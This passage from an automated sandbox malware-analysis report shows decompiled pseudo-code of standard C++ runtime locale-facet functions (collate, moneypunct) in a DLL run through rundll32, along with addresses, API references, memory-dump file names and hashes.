0x6e20f08e
0x6e20f091
0x6e20f095
0x6e20f099
0x6e20f0a6
0x6e20f0ae
0x6e20f0b0
0x00000000
0x6e20f0b0
0x6e20f077
0x6e20f077
0x00000000
0x6e20f077
0x6e20f075
0x6e20efe8
0x6e20efe8
0x6e20efeb
0x6e20efef
0x6e20eff3
0x6e20f000
0x6e20f008
0x6e20f00a
0x00000000
0x6e20f00a
0x6e20efd1
0x6e20efd1
0x00000000
0x6e20efd1
0x6e20efcf

APIs

__EH_prolog3.LIBCMT ref: 6E20EF98
std::_Lockit::_Lockit.LIBCPMT ref: 6E20EFA2
int.LIBCPMT ref: 6E20EFB9

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

collate.LIBCPMT ref: 6E20EFDC
std::_Facet_Register.LIBCPMT ref: 6E20EFF3
std::_Lockit::~_Lockit.LIBCPMT ref: 6E20F013
__CxxThrowException@8.LIBVCRUNTIME ref: 6E20F031

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowcollate
String ID:
API String ID: 2363045490-0
Opcode ID: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
Instruction ID: 5c9b8f76120b1df9aeff51c5084e6e907daec447d121e33e8a8055deb2c3d2f3
Opcode Fuzzy Hash: 9d4ec4f87350eb97de8be75f7767e3c165ab8d60c3e96bdd77b880eb4a02d8c0
Instruction Fuzzy Hash: BA11E37591051D8BCF00DBE0C894AEEB77BAF44715F140909E510AB2D0DFB4AA40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21BA8A, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 74%

			E6E21BA8A(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t55;
				signed int _t56;
				void* _t68;
				void* _t81;
				signed int _t131;
				signed int _t144;
				signed int _t145;
				signed int _t147;
				signed int _t148;
				signed int _t149;
				signed int _t150;
				void* _t154;

				_t141 = __edx;
				_t110 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t154 - 0x14, 0);
				_t147 =  *0x6e2c6e38; // 0x0
				 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
				 *(_t154 - 0x10) = _t147;
				_t55 = E6E1E161C(0x6e2c6e18);
				_t113 =  *((intOrPtr*)(_t154 + 8));
				_t56 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t55);
				_t143 = _t56;
				if(_t56 != 0) {
					L5:
					E6E2066BA(_t154 - 0x14);
					return E6E220075(_t143);
				} else {
					if(_t147 == 0) {
						_push( *((intOrPtr*)(_t154 + 8)));
						_push(_t154 - 0x10);
						__eflags = E6E21C1A4(__ebx, _t113, __edx, _t143, _t147) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t154 - 0x20);
							E6E223D74(_t154 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t143, _t147, 0x14);
							E6E206653(_t154 - 0x14, 0);
							_t148 =  *0x6e2c6e40; // 0x0
							 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
							 *(_t154 - 0x10) = _t148;
							_t68 = E6E1E161C(0x6e2c6e20);
							_t120 =  *((intOrPtr*)(_t154 + 8));
							_t144 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t68);
							__eflags = _t144;
							if(_t144 != 0) {
								L12:
								E6E2066BA(_t154 - 0x14);
								return E6E220075(_t144);
							} else {
								__eflags = _t148;
								if(_t148 == 0) {
									_push( *((intOrPtr*)(_t154 + 8)));
									_push(_t154 - 0x10);
									__eflags = E6E21C229(_t110, _t120, __edx, _t144, _t148) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t154 - 0x20);
										E6E223D74(_t154 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t110, _t144, _t148, 0x14);
										E6E206653(_t154 - 0x14, 0);
										_t149 =  *0x6e2c6e44; // 0x0
										 *(_t154 - 4) =  *(_t154 - 4) & 0x00000000;
										 *(_t154 - 0x10) = _t149;
										_t81 = E6E1E161C(0x6e2c6e24);
										_t127 =  *((intOrPtr*)(_t154 + 8));
										_t145 = E6E1E171B( *((intOrPtr*)(_t154 + 8)), _t81);
										__eflags = _t145;
										if(_t145 != 0) {
											L19:
											E6E2066BA(_t154 - 0x14);
											return E6E220075(_t145);
										} else {
											__eflags = _t149;
											if(_t149 == 0) {
												_push( *((intOrPtr*)(_t154 + 8)));
												_push(_t154 - 0x10);
												__eflags = E6E21C295(_t110, _t127, __edx, _t145, _t149) - 0xffffffff;
												if(__eflags == 0) {
													_t131 = _t154 - 0x20;
													E6E1E1438(_t131);
													E6E223D74(_t154 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e26851f, _t110, _t145, _t149, 4);
													_t150 = _t131;
													 *(_t154 - 0x10) = _t150;
													 *((intOrPtr*)(_t150 + 4)) =  *((intOrPtr*)(_t154 + 0xc));
													_push( *((intOrPtr*)(_t154 + 0x14)));
													_t49 = _t154 - 4;
													 *_t49 =  *(_t154 - 4) & 0x00000000;
													__eflags =  *_t49;
													 *_t150 = 0x6e26c414;
													 *((char*)(_t150 + 0x28)) =  *((intOrPtr*)(_t154 + 0x10));
													E6E21D028(_t110, _t131, _t141, _t145, _t150,  *_t49);
													return E6E220075(_t150,  *((intOrPtr*)(_t154 + 8)));
												} else {
													_t145 =  *(_t154 - 0x10);
													 *(_t154 - 0x10) = _t145;
													 *(_t154 - 4) = 1;
													E6E206FD3(__eflags, _t145);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t145 + 4))))();
													 *0x6e2c6e44 = _t145;
													goto L19;
												}
											} else {
												_t145 = _t149;
												goto L19;
											}
										}
									} else {
										_t144 =  *(_t154 - 0x10);
										 *(_t154 - 0x10) = _t144;
										 *(_t154 - 4) = 1;
										E6E206FD3(__eflags, _t144);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t144 + 4))))();
										 *0x6e2c6e40 = _t144;
										goto L12;
									}
								} else {
									_t144 = _t148;
									goto L12;
								}
							}
						} else {
							_t143 =  *(_t154 - 0x10);
							 *(_t154 - 0x10) = _t143;
							 *(_t154 - 4) = 1;
							E6E206FD3(__eflags, _t143);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t143 + 4))))();
							 *0x6e2c6e38 = _t143;
							goto L5;
						}
					} else {
						_t143 = _t147;
						goto L5;
					}
				}
			}

0x6e21ba8a
0x6e21ba8a
0x6e21ba91
0x6e21ba9b
0x6e21baa0
0x6e21baab
0x6e21baaf
0x6e21bab2
0x6e21bab7
0x6e21babb
0x6e21bac0
0x6e21bac4
0x6e21bb09
0x6e21bb0c
0x6e21bb18
0x6e21bac6
0x6e21bac8
0x6e21bace
0x6e21bad4
0x6e21badc
0x6e21badf
0x6e21bb1c
0x6e21bb2a
0x6e21bb2f
0x6e21bb37
0x6e21bb41
0x6e21bb46
0x6e21bb51
0x6e21bb55
0x6e21bb58
0x6e21bb5d
0x6e21bb66
0x6e21bb68
0x6e21bb6a
0x6e21bbaf
0x6e21bbb2
0x6e21bbbe
0x6e21bb6c
0x6e21bb6c
0x6e21bb6e
0x6e21bb74
0x6e21bb7a
0x6e21bb82
0x6e21bb85
0x6e21bbc2
0x6e21bbd0
0x6e21bbd5
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc0c
0x6e21bc0e
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14
0x6e21bb87
0x6e21bb87
0x6e21bb8a
0x6e21bb8e
0x6e21bb92
0x6e21bb9f
0x6e21bba7
0x6e21bba9
0x00000000
0x6e21bba9
0x6e21bb70
0x6e21bb70
0x00000000
0x6e21bb70
0x6e21bb6e
0x6e21bae1
0x6e21bae1
0x6e21bae4
0x6e21bae8
0x6e21baec
0x6e21baf9
0x6e21bb01
0x6e21bb03
0x00000000
0x6e21bb03
0x6e21baca
0x6e21baca
0x00000000
0x6e21baca
0x6e21bac8

APIs

__EH_prolog3.LIBCMT ref: 6E21BA91
std::_Lockit::_Lockit.LIBCPMT ref: 6E21BA9B
int.LIBCPMT ref: 6E21BAB2

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E21BAD5
std::_Facet_Register.LIBCPMT ref: 6E21BAEC
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BB0C
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BB2A

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
Instruction ID: 734de158d0fa54177c58d4227b11f51af845ccd0e6bbc089bfe5059c94ce5df3
Opcode Fuzzy Hash: bce9ecf732a7b4b5fc076547dad1aecc5c1a3bf6f81be0d14a4e478a59f42148
Instruction Fuzzy Hash: 1911E37A90451ECBCF04DBE4C894AFDB7BBAF45B14F180919E5116B390DBB49A40C791

Uniqueness

Uniqueness Score: -1.00%

Function 6E21B9E4, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E21B9E4(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t69;
				signed int _t70;
				void* _t82;
				void* _t95;
				void* _t108;
				signed int _t169;
				signed int _t185;
				signed int _t186;
				signed int _t187;
				signed int _t189;
				signed int _t190;
				signed int _t191;
				signed int _t192;
				signed int _t193;
				void* _t198;

				_t182 = __edx;
				_t141 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t198 - 0x14, 0);
				_t189 =  *0x6e2c6e3c; // 0x0
				 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
				 *(_t198 - 0x10) = _t189;
				_t69 = E6E1E161C(0x6e2c6e1c);
				_t144 =  *((intOrPtr*)(_t198 + 8));
				_t70 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t69);
				_t184 = _t70;
				if(_t70 != 0) {
					L5:
					E6E2066BA(_t198 - 0x14);
					return E6E220075(_t184);
				} else {
					if(_t189 == 0) {
						_push( *((intOrPtr*)(_t198 + 8)));
						_push(_t198 - 0x10);
						__eflags = E6E21C120(__ebx, _t144, __edx, _t184, _t189) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t198 - 0x20);
							E6E223D74(_t198 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t184, _t189, 0x14);
							E6E206653(_t198 - 0x14, 0);
							_t190 =  *0x6e2c6e38; // 0x0
							 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
							 *(_t198 - 0x10) = _t190;
							_t82 = E6E1E161C(0x6e2c6e18);
							_t151 =  *((intOrPtr*)(_t198 + 8));
							_t185 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t82);
							__eflags = _t185;
							if(_t185 != 0) {
								L12:
								E6E2066BA(_t198 - 0x14);
								return E6E220075(_t185);
							} else {
								__eflags = _t190;
								if(_t190 == 0) {
									_push( *((intOrPtr*)(_t198 + 8)));
									_push(_t198 - 0x10);
									__eflags = E6E21C1A4(_t141, _t151, __edx, _t185, _t190) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t198 - 0x20);
										E6E223D74(_t198 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t141, _t185, _t190, 0x14);
										E6E206653(_t198 - 0x14, 0);
										_t191 =  *0x6e2c6e40; // 0x0
										 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
										 *(_t198 - 0x10) = _t191;
										_t95 = E6E1E161C(0x6e2c6e20);
										_t158 =  *((intOrPtr*)(_t198 + 8));
										_t186 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t95);
										__eflags = _t186;
										if(_t186 != 0) {
											L19:
											E6E2066BA(_t198 - 0x14);
											return E6E220075(_t186);
										} else {
											__eflags = _t191;
											if(_t191 == 0) {
												_push( *((intOrPtr*)(_t198 + 8)));
												_push(_t198 - 0x10);
												__eflags = E6E21C229(_t141, _t158, __edx, _t186, _t191) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t198 - 0x20);
													E6E223D74(_t198 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t141, _t186, _t191, 0x14);
													E6E206653(_t198 - 0x14, 0);
													_t192 =  *0x6e2c6e44; // 0x0
													 *(_t198 - 4) =  *(_t198 - 4) & 0x00000000;
													 *(_t198 - 0x10) = _t192;
													_t108 = E6E1E161C(0x6e2c6e24);
													_t165 =  *((intOrPtr*)(_t198 + 8));
													_t187 = E6E1E171B( *((intOrPtr*)(_t198 + 8)), _t108);
													__eflags = _t187;
													if(_t187 != 0) {
														L26:
														E6E2066BA(_t198 - 0x14);
														return E6E220075(_t187);
													} else {
														__eflags = _t192;
														if(_t192 == 0) {
															_push( *((intOrPtr*)(_t198 + 8)));
															_push(_t198 - 0x10);
															__eflags = E6E21C295(_t141, _t165, _t182, _t187, _t192) - 0xffffffff;
															if(__eflags == 0) {
																_t169 = _t198 - 0x20;
																E6E1E1438(_t169);
																E6E223D74(_t198 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e26851f, _t141, _t187, _t192, 4);
																_t193 = _t169;
																 *(_t198 - 0x10) = _t193;
																 *((intOrPtr*)(_t193 + 4)) =  *((intOrPtr*)(_t198 + 0xc));
																_push( *((intOrPtr*)(_t198 + 0x14)));
																_t63 = _t198 - 4;
																 *_t63 =  *(_t198 - 4) & 0x00000000;
																__eflags =  *_t63;
																 *_t193 = 0x6e26c414;
																 *((char*)(_t193 + 0x28)) =  *((intOrPtr*)(_t198 + 0x10));
																E6E21D028(_t141, _t169, _t182, _t187, _t193,  *_t63);
																return E6E220075(_t193,  *((intOrPtr*)(_t198 + 8)));
															} else {
																_t187 =  *(_t198 - 0x10);
																 *(_t198 - 0x10) = _t187;
																 *(_t198 - 4) = 1;
																E6E206FD3(__eflags, _t187);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t187 + 4))))();
																 *0x6e2c6e44 = _t187;
																goto L26;
															}
														} else {
															_t187 = _t192;
															goto L26;
														}
													}
												} else {
													_t186 =  *(_t198 - 0x10);
													 *(_t198 - 0x10) = _t186;
													 *(_t198 - 4) = 1;
													E6E206FD3(__eflags, _t186);
													 *0x6e26a26c();
													 *((intOrPtr*)( *((intOrPtr*)( *_t186 + 4))))();
													 *0x6e2c6e40 = _t186;
													goto L19;
												}
											} else {
												_t186 = _t191;
												goto L19;
											}
										}
									} else {
										_t185 =  *(_t198 - 0x10);
										 *(_t198 - 0x10) = _t185;
										 *(_t198 - 4) = 1;
										E6E206FD3(__eflags, _t185);
										 *0x6e26a26c();
										 *((intOrPtr*)( *((intOrPtr*)( *_t185 + 4))))();
										 *0x6e2c6e38 = _t185;
										goto L12;
									}
								} else {
									_t185 = _t190;
									goto L12;
								}
							}
						} else {
							_t184 =  *(_t198 - 0x10);
							 *(_t198 - 0x10) = _t184;
							 *(_t198 - 4) = 1;
							E6E206FD3(__eflags, _t184);
							 *0x6e26a26c();
							 *((intOrPtr*)( *((intOrPtr*)( *_t184 + 4))))();
							 *0x6e2c6e3c = _t184;
							goto L5;
						}
					} else {
						_t184 = _t189;
						goto L5;
					}
				}
			}

0x6e21b9e4
0x6e21b9e4
0x6e21b9eb
0x6e21b9f5
0x6e21b9fa
0x6e21ba05
0x6e21ba09
0x6e21ba0c
0x6e21ba11
0x6e21ba15
0x6e21ba1a
0x6e21ba1e
0x6e21ba63
0x6e21ba66
0x6e21ba72
0x6e21ba20
0x6e21ba22
0x6e21ba28
0x6e21ba2e
0x6e21ba36
0x6e21ba39
0x6e21ba76
0x6e21ba84
0x6e21ba89
0x6e21ba91
0x6e21ba9b
0x6e21baa0
0x6e21baab
0x6e21baaf
0x6e21bab2
0x6e21bab7
0x6e21bac0
0x6e21bac2
0x6e21bac4
0x6e21bb09
0x6e21bb0c
0x6e21bb18
0x6e21bac6
0x6e21bac6
0x6e21bac8
0x6e21bace
0x6e21bad4
0x6e21badc
0x6e21badf
0x6e21bb1c
0x6e21bb2a
0x6e21bb2f
0x6e21bb37
0x6e21bb41
0x6e21bb46
0x6e21bb51
0x6e21bb55
0x6e21bb58
0x6e21bb5d
0x6e21bb66
0x6e21bb68
0x6e21bb6a
0x6e21bbaf
0x6e21bbb2
0x6e21bbbe
0x6e21bb6c
0x6e21bb6c
0x6e21bb6e
0x6e21bb74
0x6e21bb7a
0x6e21bb82
0x6e21bb85
0x6e21bbc2
0x6e21bbd0
0x6e21bbd5
0x6e21bbdd
0x6e21bbe7
0x6e21bbec
0x6e21bbf7
0x6e21bbfb
0x6e21bbfe
0x6e21bc03
0x6e21bc0c
0x6e21bc0e
0x6e21bc10
0x6e21bc55
0x6e21bc58
0x6e21bc64
0x6e21bc12
0x6e21bc12
0x6e21bc14
0x6e21bc1a
0x6e21bc20
0x6e21bc28
0x6e21bc2b
0x6e21bc65
0x6e21bc68
0x6e21bc76
0x6e21bc7b
0x6e21bc83
0x6e21bc88
0x6e21bc8a
0x6e21bc90
0x6e21bc93
0x6e21bc9c
0x6e21bc9c
0x6e21bc9c
0x6e21bca0
0x6e21bca6
0x6e21bca9
0x6e21bcb5
0x6e21bc2d
0x6e21bc2d
0x6e21bc30
0x6e21bc34
0x6e21bc38
0x6e21bc45
0x6e21bc4d
0x6e21bc4f
0x00000000
0x6e21bc4f
0x6e21bc16
0x6e21bc16
0x00000000
0x6e21bc16
0x6e21bc14
0x6e21bb87
0x6e21bb87
0x6e21bb8a
0x6e21bb8e
0x6e21bb92
0x6e21bb9f
0x6e21bba7
0x6e21bba9
0x00000000
0x6e21bba9
0x6e21bb70
0x6e21bb70
0x00000000
0x6e21bb70
0x6e21bb6e
0x6e21bae1
0x6e21bae1
0x6e21bae4
0x6e21bae8
0x6e21baec
0x6e21baf9
0x6e21bb01
0x6e21bb03
0x00000000
0x6e21bb03
0x6e21baca
0x6e21baca
0x00000000
0x6e21baca
0x6e21bac8
0x6e21ba3b
0x6e21ba3b
0x6e21ba3e
0x6e21ba42
0x6e21ba46
0x6e21ba53
0x6e21ba5b
0x6e21ba5d
0x00000000
0x6e21ba5d
0x6e21ba24
0x6e21ba24
0x00000000
0x6e21ba24
0x6e21ba22

APIs

__EH_prolog3.LIBCMT ref: 6E21B9EB
std::_Lockit::_Lockit.LIBCPMT ref: 6E21B9F5
int.LIBCPMT ref: 6E21BA0C

Part of subcall function 6E1E161C: std::_Lockit::_Lockit.LIBCPMT ref: 6E1E162D
Part of subcall function 6E1E161C: std::_Lockit::~_Lockit.LIBCPMT ref: 6E1E1647

moneypunct.LIBCPMT ref: 6E21BA2F
std::_Facet_Register.LIBCPMT ref: 6E21BA46
std::_Lockit::~_Lockit.LIBCPMT ref: 6E21BA66
__CxxThrowException@8.LIBVCRUNTIME ref: 6E21BA84

Memory Dump Source

Source File: 00000002.00000002.476449886.000000006E1E1000.00000020.00020000.sdmp, Offset: 6E1E0000, based on PE: true

Associated: 00000002.00000002.475479536.000000006E1E0000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.507896542.000000006E26A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.516972731.000000006E2C5000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517815594.000000006E2DC000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.517833265.000000006E2DD000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_6e1e0000_rundll32.jbxd

Yara matches

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_H_prolog3RegisterThrowmoneypunct
String ID:
API String ID: 113178234-0
Opcode ID: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
Instruction ID: c1249fca7f6cc80b9db5a7902068ea75e5d80f79faff2a3094615eaa3eb0b955
Opcode Fuzzy Hash: 384db94be18ed0e5724856dfb2a9809d3d77c266152c34c1e825148bb8edba5b
Instruction Fuzzy Hash: 33113279D0451ECBCF00DBE4C898AEDB7BBAF44B04F140919E510AB390CBB49B41CB91

Uniqueness

Uniqueness Score: -1.00%

Function 6E20F9F1, Relevance: 10.6, APIs: 7, Instructions: 54
COMMONLIBRARYCODE

Download Yara Rule

C-Code - Quality: 73%

			E6E20F9F1(void* __ebx, void* __edx, void* __edi, void* __esi, void* __eflags) {
				void* _t83;
				signed int _t84;
				void* _t96;
				void* _t109;
				void* _t122;
				void* _t135;
				signed int _t207;
				signed int _t226;
				signed int _t227;
				signed int _t228;
				signed int _t229;
				signed int _t231;
				signed int _t232;
				signed int _t233;
				signed int _t234;
				signed int _t235;
				signed int _t236;
				void* _t242;

				_t223 = __edx;
				_t172 = __ebx;
				E6E2200AC(0x6e2683cf, __ebx, __edi, __esi, 0x14);
				E6E206653(_t242 - 0x14, 0);
				_t231 =  *0x6e2c6de0; // 0x0
				 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
				 *(_t242 - 0x10) = _t231;
				_t83 = E6E1E161C(0x6e2c6d8c);
				_t175 =  *((intOrPtr*)(_t242 + 8));
				_t84 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t83);
				_t225 = _t84;
				if(_t84 != 0) {
					L5:
					E6E2066BA(_t242 - 0x14);
					return E6E220075(_t225);
				} else {
					if(_t231 == 0) {
						_push( *((intOrPtr*)(_t242 + 8)));
						_push(_t242 - 0x10);
						__eflags = E6E211471(__ebx, _t175, __edx, _t225, _t231) - 0xffffffff;
						if(__eflags == 0) {
							E6E1E1438(_t242 - 0x20);
							E6E223D74(_t242 - 0x20, 0x6e2c3504);
							asm("int3");
							E6E2200AC(0x6e2683cf, __ebx, _t225, _t231, 0x14);
							E6E206653(_t242 - 0x14, 0);
							_t232 =  *0x6e2c6dfc; // 0x0
							 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
							 *(_t242 - 0x10) = _t232;
							_t96 = E6E1E161C(0x6e2c6da8);
							_t182 =  *((intOrPtr*)(_t242 + 8));
							_t226 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t96);
							__eflags = _t226;
							if(_t226 != 0) {
								L12:
								E6E2066BA(_t242 - 0x14);
								return E6E220075(_t226);
							} else {
								__eflags = _t232;
								if(_t232 == 0) {
									_push( *((intOrPtr*)(_t242 + 8)));
									_push(_t242 - 0x10);
									__eflags = E6E2114EC(_t172, _t182, __edx, _t226, _t232) - 0xffffffff;
									if(__eflags == 0) {
										E6E1E1438(_t242 - 0x20);
										E6E223D74(_t242 - 0x20, 0x6e2c3504);
										asm("int3");
										E6E2200AC(0x6e2683cf, _t172, _t226, _t232, 0x14);
										E6E206653(_t242 - 0x14, 0);
										_t233 =  *0x6e2c6dcc; // 0x0
										 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
										 *(_t242 - 0x10) = _t233;
										_t109 = E6E1E161C(0x6e2c6d80);
										_t189 =  *((intOrPtr*)(_t242 + 8));
										_t227 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t109);
										__eflags = _t227;
										if(_t227 != 0) {
											L19:
											E6E2066BA(_t242 - 0x14);
											return E6E220075(_t227);
										} else {
											__eflags = _t233;
											if(_t233 == 0) {
												_push( *((intOrPtr*)(_t242 + 8)));
												_push(_t242 - 0x10);
												__eflags = E6E211558(_t172, _t189, __edx, _t227, _t233) - 0xffffffff;
												if(__eflags == 0) {
													E6E1E1438(_t242 - 0x20);
													E6E223D74(_t242 - 0x20, 0x6e2c3504);
													asm("int3");
													E6E2200AC(0x6e2683cf, _t172, _t227, _t233, 0x14);
													E6E206653(_t242 - 0x14, 0);
													_t234 =  *0x6e2c6e00; // 0x0
													 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
													 *(_t242 - 0x10) = _t234;
													_t122 = E6E1E161C(0x6e2c6dac);
													_t196 =  *((intOrPtr*)(_t242 + 8));
													_t228 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t122);
													__eflags = _t228;
													if(_t228 != 0) {
														L26:
														E6E2066BA(_t242 - 0x14);
														return E6E220075(_t228);
													} else {
														__eflags = _t234;
														if(_t234 == 0) {
															_push( *((intOrPtr*)(_t242 + 8)));
															_push(_t242 - 0x10);
															__eflags = E6E2115C4(_t172, _t196, _t223, _t228, _t234) - 0xffffffff;
															if(__eflags == 0) {
																E6E1E1438(_t242 - 0x20);
																E6E223D74(_t242 - 0x20, 0x6e2c3504);
																asm("int3");
																E6E2200AC(0x6e2683cf, _t172, _t228, _t234, 0x14);
																E6E206653(_t242 - 0x14, 0);
																_t235 =  *0x6e2c6dd0; // 0x0
																 *(_t242 - 4) =  *(_t242 - 4) & 0x00000000;
																 *(_t242 - 0x10) = _t235;
																_t135 = E6E1E161C(0x6e2c6d60);
																_t203 =  *((intOrPtr*)(_t242 + 8));
																_t229 = E6E1E171B( *((intOrPtr*)(_t242 + 8)), _t135);
																__eflags = _t229;
																if(_t229 != 0) {
																	L33:
																	E6E2066BA(_t242 - 0x14);
																	return E6E220075(_t229);
																} else {
																	__eflags = _t235;
																	if(_t235 == 0) {
																		_push( *((intOrPtr*)(_t242 + 8)));
																		_push(_t242 - 0x10);
																		__eflags = E6E21162A(_t172, _t203, _t223, _t229, _t235) - 0xffffffff;
																		if(__eflags == 0) {
																			_t207 = _t242 - 0x20;
																			E6E1E1438(_t207);
																			E6E223D74(_t242 - 0x20, 0x6e2c3504);
																			asm("int3");
																			E6E2200AC(0x6e26851f, _t172, _t229, _t235, 4);
																			_t236 = _t207;
																			 *(_t242 - 0x10) = _t236;
																			 *((intOrPtr*)(_t236 + 4)) =  *((intOrPtr*)(_t242 + 0xc));
																			_push( *((intOrPtr*)(_t242 + 0x14)));
																			_t77 = _t242 - 4;
																			 *_t77 =  *(_t242 - 4) & 0x00000000;
																			__eflags =  *_t77;
																			 *_t236 = 0x6e26c0c4;
																			 *((char*)(_t236 + 0x28)) =  *((intOrPtr*)(_t242 + 0x10));
																			E6E21542F(_t172, _t207, _t223, _t229, _t236,  *_t77);
																			return E6E220075(_t236,  *((intOrPtr*)(_t242 + 8)));
																		} else {
																			_t229 =  *(_t242 - 0x10);
																			 *(_t242 - 0x10) = _t229;
																			 *(_t242 - 4) = 1;
																			E6E206FD3(__eflags, _t229);
																			 *0x6e26a26c();
																			 *((intOrPtr*)( *((intOrPtr*)( *_t229 + 4))))();
																			 *0x6e2c6dd0 = _t229;
																			goto L33;
																		}
																	} else {
																		_t229 = _t235;
																		goto L33;
																	}
																}
															} else {
																_t228 =  *(_t242 - 0x10);
																 *(_t242 - 0x10) = _t228;
																 *(_t242 - 4) = 1;
																E6E206FD3(__eflags, _t228);
																 *0x6e26a26c();
																 *((intOrPtr*)( *((intOrPtr*)( *_t228 + 4))))();
																 *0x6e2c6e00 = _t228;
																goto L26;
															}
														} else {
															_t228 = _t234;
															goto L26;
														}
													}
												} else {
													_t227 =  *(_t242 - 0x10);
